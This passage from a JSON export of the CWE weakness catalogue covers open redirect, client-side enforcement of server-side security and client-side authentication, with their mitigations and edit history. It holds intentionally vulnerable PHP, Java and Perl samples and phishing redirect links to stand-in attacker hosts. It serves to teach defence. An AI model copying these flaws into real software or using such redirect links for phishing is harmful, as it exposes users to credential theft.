Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"Missing Catch Block","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Catch All Exceptions (Missing Catch Block)","attr":{"@_Date":"2009-03-10"}},{"#text":"Failure to Catch All Exceptions in Servlet","attr":{"@_Date":"2010-12-13"}}]}},"601":{"attr":{"@_ID":"601","@_Name":"URL Redirection to Untrusted Site (\'Open Redirect\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks.","Extended_Description":"An http parameter may contain a URL value and could cause the web application to redirect the request to the specified URL. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts have a more trustworthy appearance.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"610","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"610","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"Phishing is a general term for deceptive attempts to coerce private information from users that will be used for identity theft."},"Alternate_Terms":{"Alternate_Term":[{"Term":"Open Redirect"},{"Term":"Cross-site Redirect"},{"Term":"Cross-domain Redirect"}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"The user may be redirected to an untrusted page that contains malware which may then compromise the user\'s machine. This will expose the user to extensive risk and the user\'s interaction with the web server may also be compromised if the malware conducts keylogging or other attacks that steal credentials, personally identifiable information (PII), or other important data."},{"Scope":["Access Control","Confidentiality","Other"],"Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity","Other"],"Note":"The user may be subjected to phishing attacks by being redirected to an untrusted page. The phishing attack may point to an attacker controlled web page that appears to be a trusted web site. The phishers may then steal the user\'s credentials and then use these credentials to access the legitimate web site."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-10"},"Method":"Manual Static Analysis","Description":"Since this weakness does not typically appear frequently within a single software package, manual white box techniques may be able to provide sufficient code coverage and reduction of false positives if all potentially-vulnerable operations can be assessed within limited time constraints.","Effectiveness":"High"},{"Method":"Automated Dynamic Analysis","Description":"Automated black box tools that supply URLs to every input may be able to spot Location header modifications, but test case coverage is a factor, and custom redirects may not be detected."},{"Method":"Automated Static Analysis","Description":"Automated static analysis tools may not be able to determine whether input influences the beginning of a URL, which is important for reducing false positives."},{"Method":"Other","Description":"Whether this issue poses a vulnerability will be subject to the intended behavior of the application. For example, a search engine might intentionally provide redirects to arbitrary URLs."},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","Use a list of approved URLs or domains to be used for redirection."]}},{"Phase":"Architecture and Design","Description":"Use an intermediate disclaimer page that provides the user with a clear warning that they are leaving the current site. Implement a long timeout before the redirect occurs, or force the user to click on the link. Be careful to avoid XSS problems (CWE-79) when generating the disclaimer page."},{"attr":{"@_Mitigation_ID":"MIT-21.2"},"Phase":"Architecture and Design","Strategy":"Enforcement by Conversion","Description":{"xhtml:p":["When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.","For example, ID 1 could map to \\"/login.asp\\" and ID 2 could map to \\"http://www.example.com/\\". Features such as the ESAPI AccessReferenceMap [REF-45] provide this capability."]}},{"Phase":"Architecture and Design","Description":"Ensure that no externally-supplied requests are honored by requiring that all redirect requests include a unique nonce generated by the application [REF-483]. Be sure that the nonce is not predictable (CWE-330).","Effectiveness_Notes":"Note that this can be bypassed using XSS (CWE-79)."},{"attr":{"@_Mitigation_ID":"MIT-6"},"Phase":["Architecture and Design","Implementation"],"Strategy":"Attack Surface Reduction","Description":{"xhtml:p":["Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls.","Many open redirect problems occur because the programmer assumed that certain inputs could not be modified, such as cookies and hidden form fields."]}},{"attr":{"@_Mitigation_ID":"MIT-29"},"Phase":"Operation","Strategy":"Firewall","Description":"Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth.","Effectiveness":"Moderate","Effectiveness_Notes":"An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code obtains a URL from the query string and then redirects the user to that URL.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$redirect_url = $_GET[\'url\'];header(\\"Location: \\" . $redirect_url);","xhtml:br":""}},{"attr":{"@_Nature":"attack"},"xhtml:div":"http://example.com/example.php?url=http://malicious.example.com"}],"Body_Text":["The problem with the above code is that an attacker could use this page as part of a phishing scam by redirecting users to a malicious site. For example, assume the above code is in the file example.php. An attacker could supply a user with the following link:","The user sees the link pointing to the original trusted site (example.com) and does not realize the redirection that could take place."]},{"Intro_Text":"The following code is a Java servlet that will receive a GET request with a url parameter in the request to redirect the browser to the address specified in the url parameter. The servlet will retrieve the url parameter value from the request and send a response to redirect the browser to the url address.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class RedirectServlet extends HttpServlet {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {}","xhtml:div":{"#text":"String query = request.getQueryString();if (query.contains(\\"url\\")) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"String url = request.getParameter(\\"url\\");response.sendRedirect(url);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}}}},{"attr":{"@_Nature":"attack","@_Language":"HTML"},"xhtml:div":"&lt;a href=\\"http://bank.example.com/redirect?url=http://attacker.example.net\\"&gt;Click here to log in&lt;/a&gt;"}],"Body_Text":["The problem with this Java servlet code is that an attacker could use the RedirectServlet as part of a e-mail phishing scam to redirect users to a malicious site. An attacker could send an HTML formatted e-mail directing the user to log into their account by including in the e-mail the following link:","The user may assume that the link is safe since the URL starts with their trusted bank, bank.example.com. However, the user will then be redirected to the attacker\'s web site (attacker.example.net) which the attacker may have made to appear very similar to bank.example.com. The user may then unwittingly enter credentials into the attacker\'s web page and compromise their bank account. A Java servlet should never redirect a user to a URL without verifying that the redirect address is a trusted site."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-4206","Description":"URL parameter loads the URL into a frame and causes it to appear to be part of a valid page.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4206"},{"Reference":"CVE-2008-2951","Description":"An open redirect vulnerability in the search script in the software allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL as a parameter to the proper function.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2951"},{"Reference":"CVE-2008-2052","Description":"Open redirect vulnerability in the software allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the proper parameter.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2052"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":38,"Entry_Name":"URl Redirector Abuse"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-483"}},{"attr":{"@_External_Reference_ID":"REF-484","@_Section":"Page 43"}},{"attr":{"@_External_Reference_ID":"REF-485"}},{"attr":{"@_External_Reference_ID":"REF-45"}}]},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Background_Details, Description, Detection_Factors, Likelihood_of_Exploit, Name, Relationships, Observed_Example, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-03","Modification_Comment":"updated References and Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Alternate_Terms, Observed_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples, Detection_Factors, Likelihood_of_Exploit, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Detection_Factors, Potential_Mitigations, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Unsafe URL Redirection","attr":{"@_Date":"2008-04-11"}},{"#text":"URL Redirection to Untrusted Site","attr":{"@_Date":"2008-09-09"}},{"#text":"URL Redirection to Untrusted Site (aka \'Open Redirect\')","attr":{"@_Date":"2009-05-27"}}]}},"602":{"attr":{"@_ID":"602","@_Name":"Client-Side Enforcement of Server-Side Security","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software is composed of a server that relies on the client to implement a mechanism that is intended to protect the server.","Extended_Description":"When the server relies on protection mechanisms placed on the client side, an attacker can modify the client-side behavior to bypass the protection mechanisms resulting in potentially unexpected interactions between the client and server. The consequences will vary, depending on what the mechanisms are trying to protect.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"669","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"471","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"290","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"300","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Architecture and Design","Note":"Consider a product that consists of two or more processes or nodes that must interact closely, such as a client/server model. If the product uses protection schemes in the client in order to defend from attacks against the server, and the server does not use the same schemes, then an attacker could modify the client in a way that bypasses those schemes. This is a fundamental design flaw that is primary to many weaknesses."}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":["Access Control","Availability"],"Impact":["Bypass Protection Mechanism","DoS: Crash, Exit, or Restart"],"Note":"Client-side validation checks can be easily bypassed, allowing malformed or unexpected input to pass into the application, potentially as trusted data. This may lead to unexpected states, behaviors and possibly a resulting crash."},{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"Client-side checks for authentication can be easily bypassed, allowing clients to escalate their access levels and perform unintended actions."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":{"xhtml:p":["For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.","Even though client-side checks provide minimal benefits with respect to server-side security, they are still useful. First, they can support intrusion detection. If the server receives input that should have been rejected by the client, then it may be an indication of an attack. Second, client-side error-checking can provide helpful feedback to the user about the expectations for valid input. Third, there may be a reduction in server-side processing time for accidental input errors, although this is typically a small savings."]}},{"Phase":"Architecture and Design","Description":"If some degree of trust is required between the two entities, then use integrity checking and strong authentication to ensure that the inputs are coming from a trusted source. Design the product so that this trust is managed in a centralized fashion, especially if there are complex or numerous communication channels, in order to reduce the risks that the implementer will mistakenly omit a check in a single code path."},{"Phase":"Testing","Description":"Use dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results."},{"Phase":"Testing","Description":"Use tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This example contains client-side code that checks if the user authenticated successfully before sending a command. The server-side code performs the authentication in one step, and executes the command in a separate step.","Body_Text":["CLIENT-SIDE (client.pl)","SERVER-SIDE (server.pl):","The server accepts 2 commands, \\"AUTH\\" which authenticates the user, and \\"CHANGE-ADDRESS\\" which updates the address field for the username. The client performs the authentication and only sends a CHANGE-ADDRESS for that user if the authentication succeeds. Because the client has already performed the authentication, the server assumes that the username in the CHANGE-ADDRESS is the same as the authenticated user. An attacker could modify the client by removing the code that sends the \\"AUTH\\" command and simply executing the CHANGE-ADDRESS."],"Example_Code":[{"attr":{"@_Nature":"good","@_Language":"Perl"},"xhtml:div":{"#text":"$server = \\"server.example.com\\";$username = AskForUserName();$password = AskForPassword();$address = AskForAddress();$sock = OpenSocket($server, 1234);writeSocket($sock, \\"AUTH $username $password\\\\n\\");$resp = readSocket($sock);if ($resp eq \\"success\\") {}else {}","xhtml:br":["","","","","","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"writeSocket($sock, \\"CHANGE-ADDRESS $username $address\\\\n\\";","xhtml:br":["",""],"xhtml:i":"# username/pass is valid, go ahead and update the info!"}},{"#text":"print \\"ERROR: Invalid Authentication!\\\\n\\";","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"bad"},"xhtml:div":{"#text":"$sock = acceptSocket(1234);($cmd, $args) = ParseClientRequest($sock);if ($cmd eq \\"AUTH\\") {}elsif ($cmd eq \\"CHANGE-ADDRESS\\") {}","xhtml:br":["","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"($username, $pass) = split(/\\\\s+/, $args, 2);$result = AuthenticateUser($username, $pass);writeSocket($sock, \\"$result\\\\n\\");","xhtml:br":["","","","","",""],"xhtml:i":["# does not close the socket on failure; assumes the","# user will try again"]}},{"#text":"if (validateAddress($args)) {}else {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"$res = UpdateDatabaseRecord($username, \\"address\\", $args);writeSocket($sock, \\"SUCCESS\\\\n\\");","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"writeSocket($sock, \\"FAILURE -- address is malformed\\\\n\\");","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}]}}]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2006-6994","Description":"ASP program allows upload of .asp files by bypassing client-side checks.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6994"},{"Reference":"CVE-2007-0163","Description":"steganography products embed password information in the carrier file, which can be extracted from a modified client.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0163"},{"Reference":"CVE-2007-0164","Description":"steganography products embed password information in the carrier file, which can be extracted from a modified client.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0164"},{"Reference":"CVE-2007-0100","Description":"client allows server to modify client\'s configuration and overwrite arbitrary files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0100"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A1","Entry_Name":"Unvalidated Input","Mapping_Fit":"CWE More Specific"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"162"}},{"attr":{"@_CAPEC_ID":"202"}},{"attr":{"@_CAPEC_ID":"207"}},{"attr":{"@_CAPEC_ID":"208"}},{"attr":{"@_CAPEC_ID":"21"}},{"attr":{"@_CAPEC_ID":"31"}},{"attr":{"@_CAPEC_ID":"383"}},{"attr":{"@_CAPEC_ID":"384"}},{"attr":{"@_CAPEC_ID":"385"}},{"attr":{"@_CAPEC_ID":"386"}},{"attr":{"@_CAPEC_ID":"387"}},{"attr":{"@_CAPEC_ID":"388"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 23, &#34;Client-Side Security Is an Oxymoron&#34; Page 687"}}},"Notes":{"Note":{"#text":"Server-side enforcement of client-side security is conceptually likely to occur, but some architectures might have these strong dependencies as part of legitimate behavior, such as thin clients.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2007-05-07","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships, Research_Gaps, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Enabling_Factors_for_Exploitation, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}],"Previous_Entry_Name":[{"#text":"Client-Side Enforcement of Server-Side Security","attr":{"@_Date":"2008-04-11"}},{"#text":"Design Principle Violation: Client-Side Enforcement of Server-Side Security","attr":{"@_Date":"2009-01-12"}}]}},"603":{"attr":{"@_ID":"603","@_Name":"Use of Client-Side Authentication","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A client/server product performs authentication within client code but not in server code, allowing server-side authentication to be bypassed via a modified client that omits the authentication check.","Extended_Description":"Client-side authentication is extremely weak and may be breached easily. Any attacker may read the source code and reverse-engineer the authentication mechanism to access parts of the application which would otherwise be protected.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"602","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"300","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"656","@_View_ID":"1000"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Do not rely on client side data. Always perform server side authentication."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2006-0230","Description":"Client-side check for a password allows access to a server using crafted XML requests from a modified client.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0230"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, &#34;Untrustworthy Credentials&#34;, Page 37"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated 